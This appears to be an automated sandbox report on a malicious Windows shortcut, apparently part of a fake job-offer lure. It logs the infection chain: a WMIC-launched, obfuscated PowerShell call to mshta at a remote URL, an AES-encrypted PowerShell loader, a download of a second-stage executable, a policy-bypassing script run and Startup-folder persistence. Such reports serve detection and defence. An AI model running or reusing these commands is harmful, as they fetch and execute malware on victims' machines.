Source: powershell.exe, 00000009.00000002.3087042834.000001DD4EC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_7d374351-5
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: This is a third-party compiled AutoIt script.16_2_00007FF655FE37B0
Source: BnQwAP.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: BnQwAP.exe, 00000010.00000000.1703721677.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1c30fbe3-b
Source: BnQwAP.exe, 00000010.00000000.1703721677.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_81c75e3c-0
Source: BnQwAP.exe.9.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b23ef89e-9
Source: BnQwAP.exe.9.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_290e809c-3
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.1456334253.0000029CCDADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"``memstr_18eb28d4-b
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BnQwAP.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: lKin1m7Pf2.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605BF80: CreateFileW,DeviceIoControl,CloseHandle,16_2_00007FF65605BF80
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,16_2_00007FF65604D2C4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00007FF65605D750
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65607F63016_2_00007FF65607F630
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601175016_2_00007FF656011750
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560917C016_2_00007FF6560917C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE183C16_2_00007FF655FE183C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65602184016_2_00007FF656021840
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605D87C16_2_00007FF65605D87C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65600F8D016_2_00007FF65600F8D0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FF58D016_2_00007FF655FF58D0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560195B016_2_00007FF6560195B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560756A016_2_00007FF6560756A0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FEB39016_2_00007FF655FEB390
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560732AC16_2_00007FF6560732AC
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65602529C16_2_00007FF65602529C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE5F3C16_2_00007FF655FE5F3C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65607206C16_2_00007FF65607206C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65600C13016_2_00007FF65600C130
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FEBE7016_2_00007FF655FEBE70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65600BEB416_2_00007FF65600BEB4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FF3C2016_2_00007FF655FF3C20
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601793C16_2_00007FF65601793C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FEB9F016_2_00007FF655FEB9F0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608BA0C16_2_00007FF65608BA0C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656061A1816_2_00007FF656061A18
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FFFA4F16_2_00007FF655FFFA4F
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608DB1816_2_00007FF65608DB18
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560267F016_2_00007FF6560267F0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601A8A016_2_00007FF65601A8A0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608055C16_2_00007FF65608055C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608A59C16_2_00007FF65608A59C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608C6D416_2_00007FF65608C6D4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65607836016_2_00007FF656078360
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560683D416_2_00007FF6560683D4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65600C3FC16_2_00007FF65600C3FC
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65602240016_2_00007FF656022400
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560184C016_2_00007FF6560184C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65600451416_2_00007FF656004514
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560002C416_2_00007FF6560002C4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65607632016_2_00007FF656076320
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560130DC16_2_00007FF6560130DC
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656026DE416_2_00007FF656026DE4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FF2E3016_2_00007FF655FF2E30
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FF0E7016_2_00007FF655FF0E70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65608CE8C16_2_00007FF65608CE8C
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656000E9016_2_00007FF656000E90
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656076C3416_2_00007FF656076C34
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022D2016_2_00007FF656022D20
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656080AEC16_2_00007FF656080AEC
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE2AE016_2_00007FF655FE2AE0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: String function: 00007FF656008D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2544
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2544Jump to behavior
Source: classification engineClassification label: mal100.expl.evad.winLNK@45/62@4/2
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656063778 GetLastError,FormatMessageW,16_2_00007FF656063778
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00007FF65604D5CC
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604CCE0 AdjustTokenPrivileges,CloseHandle,16_2_00007FF65604CCE0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560657B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,16_2_00007FF6560657B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,16_2_00007FF65605BE00
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656077E38 CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,16_2_00007FF656077E38
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,16_2_00007FF655FE6580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp1n5lzj.gus.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: lKin1m7Pf2.lnkVirustotal: Detection: 25%
Source: lKin1m7Pf2.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BnQwAP.exe "C:\Users\user\AppData\Roaming\BnQwAP.exe"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B